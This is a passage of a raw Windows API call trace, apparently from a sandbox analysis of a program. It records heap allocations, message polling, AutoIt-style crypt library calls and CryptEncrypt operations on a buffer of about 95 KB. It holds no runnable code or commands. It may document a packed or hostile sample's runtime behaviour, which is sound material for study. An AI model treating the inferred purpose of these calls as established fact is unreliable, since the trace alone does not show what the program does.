lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0199.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.040] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0199.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0199.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.041] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0199.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0199.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0199.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0199.042] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0199.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.042] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.042] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0199.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0199.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.044] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2678, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2678*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0199.044] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.044] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.044] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0199.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.044] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0199.044] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.044] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.044] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.045] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.045] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.045] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0199.045] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.045] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0199.045] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.046] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x174c0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x174d0) returned 1 [0199.046] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.046] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.046] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.046] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.046] CharLowerBuffW (in: lpsz="byte[95441]", cchLength=0xb | out: lpsz="byte[95441]") returned 0xb [0199.046] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.048] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.048] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.048] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.050] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8d998*, pdwDataLen=0x87e820*=0x174c0, dwBufLen=0x174d0 | out: pbData=0xa8d998*, pdwDataLen=0x87e820*=0x174d0) returned 1 [0199.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.053] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.053] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.053] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.053] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0199.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.053] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.053] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.053] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.054] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0199.054] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.054] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.054] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.054] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0199.054] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.061] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.062] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.062] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.068] PeekMessageW (in: 